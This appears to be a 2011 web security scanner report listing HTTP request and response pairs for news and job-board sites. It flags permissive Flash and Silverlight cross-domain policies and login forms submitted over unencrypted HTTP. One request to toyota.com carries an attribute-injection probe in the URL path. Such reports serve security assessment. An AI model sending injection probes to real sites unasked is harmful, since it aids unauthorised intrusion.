| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:41:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=gf3uf2l80p Expires: Sat, 26 Jul 1997 05:00:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: PHPSESSID=gf3uf2l80p Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 56675 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title ...[SNIP]... <input type="hidden" name="clscandidateinfo ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.legalauthority |
| Path: | /tmlandingpage.php |
| GET /tmlandingpage.php HTTP/1.1 Host: www.legalauthority.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:41:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=ldenka01g7 Expires: Sat, 26 Jul 1997 05:00:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: PHPSESSID=ldenka01g7 Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 56234 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title ...[SNIP]... <input type="hidden" name="clscandidateinfo ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | http://www.toyota.com |
| Path: | /mobility/index.html |
| GET /mobilityecf7d"style%3d"x Host: www.toyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C |
| HTTP/1.1 301 Moved Permanently Server: Apache Location: http://www.toyotamobility Content-Length: 295 Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 21 Jan 2011 19:54:10 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.huffingtonpost |
| Path: | /crossdomain.xml |
| GET /crossdomain.xml HTTP/1.0 Host: www.huffingtonpost.com |
| HTTP/1.0 200 OK Server: Apache/2.2.8 (Unix) Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT ETag: "26e2850-fd-48a53d22e2200 Content-Type: application/xml Date: Fri, 21 Jan 2011 22:28:28 GMT Content-Length: 253 Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.msnbc.msn.com |
| Path: | /crossdomain.xml |
| GET /crossdomain.xml HTTP/1.0 Host: www.msnbc.msn.com |
| HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Mon, 13 Dec 2010 23:28:06 GMT ETag: "fa4f1f651d9bcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 21 Jan 2011 23:39:25 GMT Content-Length: 3654 Connection: close Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com <?xml version="1.0"?> <!-- http://www.msnbc.com <cross-domain-policy> <allow-access-from domain="nbcsports.com" /> <allow-access-from domain="nbcsports.msnbc.com" /> <allow-access-from domain="*.nbcsports.com" /> <allow-access-from domain="*.nbcsports.msnbc.com" /> <allow-access-from domain="*.msnbc.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msnbc.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="msnbciweb" /> <allow-access-from domain="*.ivillage.com " /> <allow-access-from domain="i.ivillage.com" /> <allow-access-from domain="devi.ivillage.com" /> <allow-access-from domain="*.nbcuni.com " /> <allow-access-from domain="*.newsweek.com"/> <allow-access-from domain="*.washingtonpost.com"/> <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.feedburner.com"/> <allow-access-from domain="msnbc-xpress" /> <allow-access-from domain="www.cnbc.com"/> <allow-access-from domain="*.cnbc.com"/> <allow-access-from domain="widgets.nbcuni.com"/> <allow-access-from domain="*.thenbcagency.com"/> <allow-access-from domain="*.veoh.com"/> <allow-access-from domain="*.imeem.com"/> <allow-access-from domain="*.livejournal.com"/> <allow-access-from domain="*.vox.com"/> <allow-access-from domain="*.sixapart.com"/> <allow-access-from domain="*.reuters.com"/> <allow-access-from domain="*.real.com"/> <allow-access-from domain="*.akamai.net"/> <allow-access-from domain="*.atlasrichmedia.co.au"/> <allow-access-from domain="*.atlasrichmedia.co.uk"/> <allow-access-from domain="*.atlasrichmedia.com"/> <allow-access-from domain="*.redcated"/> <allow-access-from domain="*.eyeblasterwiz.com"/> <allow-access-from domain="*.serving-sys.com"/> <allow-access-from domain="*.Abc.com"/> <allow-access-from domain="*.Abcnews.com"/> <allow-access-from domain="*.Accuweather.com"/> <allow-access-from domain="*.Cbs.com"/> <allow-access-from domain="*.cbsnews.com"/> <allow-access-from domain="*.discovery.com"/> <allow-access-from domain="*.ew.com"/> <allow-access-from domain="*.fox.com"/> <allow-access-from domain="*.foxnews.com"/> <allow-access-from domain="*.ign.com"/> <allow-access-from domain="*.people.com"/> <allow-access-from domain="*.tvguide.com"/> <allow-access-from domain="*.weather.com"/> <allow-access-from domain="*.vh1.com"/> <allow-access-from domain="*.usatoday.com"/> <allow-access-from domain="*.bmg.com"/> <allow-access-from domain="*.bmgmusic.com"/> <allow-access-from domain="*.people.com"/> <allow-access-from domain="*.fluid.nl"/> <allow-access-from domain="*.myspace.com"/> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.newsvine.com"/> <allow-access-from domain="*.stamen.com" /> <allow-access-from domain="64.207.156.207"/> <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="msnbcmedia.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.s-msn.com" /> <allow-access-from domain="*.telemundo.com" /> <allow-access-from domain="*.unicornmedia.com" /> <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.intellitxt.com"/> <allow-access-from domain="*.panachetech.com"/> <allow-access-from domain="*.interpolls.com"/> <allow-access-from domain="*.unicornmedia.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.unicornapp.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.unicornmediabeta.com" secure="false"/> ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.nytimes.com |
| Path: | /crossdomain.xml |
| GET /crossdomain.xml HTTP/1.0 Host: www.nytimes.com |
| HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 22 Jan 2011 01:23:31 GMT Content-length: 1169 Content-type: text/xml Set-cookie: RMID=2d1ea85e6af94d3 Last-modified: Wed, 21 Jul 2010 15:01:34 GMT Accept-ranges: bytes Connection: keep-alive <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.*.nytimes.com" /> <allow-access-from domain="*.nytimes.com" /> <allow-access-from domain="*.nytvideo.feedroom.com" /> <allow-access-from domain="*.www.feedroom.com" /> <allow-access-from domain="*.chumby.com" /> <allow-access-from domain="*.createthe.com" /> <allow-access-from domain="*.predictify.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.*.brightcove.com" /> <allow-access-from domain="*.nytsyndicate.com"/> <allow-access-from domain="*.*.nytsyndicate.com"/> <allow-access-from domain="xdce.adobe.com" /> <allow-access-from domain="www.rokkandev.com" /> <allow-access-from domain="cdn.eyewonder.com" /> <allow-access-from domain="apps.eyewonderlabs.com" /> <allow-access-from domain="media.pointroll.com" /> <allow-access-from domain="speed.pointroll.com" /> <allow-access-from domain="u-sta.unicast.com"/> <allow-access-from domain="creativeby1.unicast.com"/> <allow-access-from domain="creativeby2.unicast.com"/> <allow-access-from domain="picklegroup.com"/> ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.politico.com |
| Path: | /crossdomain.xml |
| GET /crossdomain.xml HTTP/1.0 Host: www.politico.com |
| HTTP/1.0 200 OK Server: Apache/2.2.6 (Fedora) Last-Modified: Mon, 08 Mar 2010 23:08:26 GMT ETag: "ffc7c-2cc-24782e80" Content-Type: text/xml Cache-Control: max-age=10 Expires: Fri, 21 Jan 2011 23:39:59 GMT Date: Fri, 21 Jan 2011 23:39:49 GMT Content-Length: 716 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.politico.com" /> <allow-access-from domain="*brightcove" /> <allow-access-from domain="*.brightcove" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.politiconetwork.com" /> <allow-access-from domain="brightcove.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cache.btrll.com" secure="true" /> ...[SNIP]... <allow-access-from domain="admin.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.google-analytics.com"/> <allow-access-from domain="*.omniture.com"/> ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.usatoday.com |
| Path: | /crossdomain.xml |
| GET /crossdomain.xml HTTP/1.0 Host: www.usatoday.com |
| HTTP/1.1 200 OK Content-Length: 1507 Content-Type: text/xml Last-Modified: Mon, 02 Aug 2010 19:50:58 GMT Accept-Ranges: bytes ETag: "72574c77c32cb1:1f" Server: Microsoft-IIS/6.0 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Sat, 22 Jan 2011 01:23:58 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="projects.usatoday.com"/> <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.usatoday.com |
| Path: | /clientaccesspolicy.xml |
| GET /clientaccesspolicy.xml HTTP/1.0 Host: www.usatoday.com |
| HTTP/1.1 200 OK Content-Length: 730 Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:58:44 GMT Accept-Ranges: bytes ETag: "3115b4c8f2baca1:1f" Server: Microsoft-IIS/6.0 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Sat, 22 Jan 2011 01:23:58 GMT Connection: close <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.msnbc.msn.com |
| Path: | /clientaccesspolicy.xml |
| GET /clientaccesspolicy.xml HTTP/1.0 Host: www.msnbc.msn.com |
| HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT ETag: "55f13f705474ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET X-Cnection: close Date: Fri, 21 Jan 2011 23:39:25 GMT Content-Length: 533 Connection: close Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*" > <domain uri="http://msnbc-ugc <domain uri="http://*.interactive <domain uri="http://*.msnbc.msn.com"/> <domain uri="https://*.msnbc.msn.com"/> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.100kcrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.100kcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:12 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=4gi6e55n6c Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:12 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 106106 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.accountin |
| Path: | / |
| GET / HTTP/1.1 Host: www.accountingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:13 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=m8i6cd531h Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 116767 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.accountma |
| Path: | / |
| GET / HTTP/1.1 Host: www.accountmanagemen Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:14 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=bvhhpa1ste Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 137270 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.actuarial |
| Path: | / |
| GET / HTTP/1.1 Host: www.actuarialcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:22 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=gfsjuvk6a0 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:22 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 114356 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.admincrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.admincrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:29 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=9hecq37ajc Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109804 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.advertisi |
| Path: | / |
| GET / HTTP/1.1 Host: www.advertisingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:29 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=4vstlithvj Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 121935 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.aerospace |
| Path: | / |
| GET / HTTP/1.1 Host: www.aerospacecrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:33 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=smekqvtb2j Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:33 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109477 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.agricultu |
| Path: | / |
| GET / HTTP/1.1 Host: www.agriculturalcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:34 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ukabttsk8n Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:34 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 102618 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.architect |
| Path: | / |
| GET / HTTP/1.1 Host: www.architecturecrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:50 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=u8cdprgtig Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:51 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 125304 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.attorneyresume |
| Path: | / |
| GET / HTTP/1.1 Host: www.attorneyresume.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
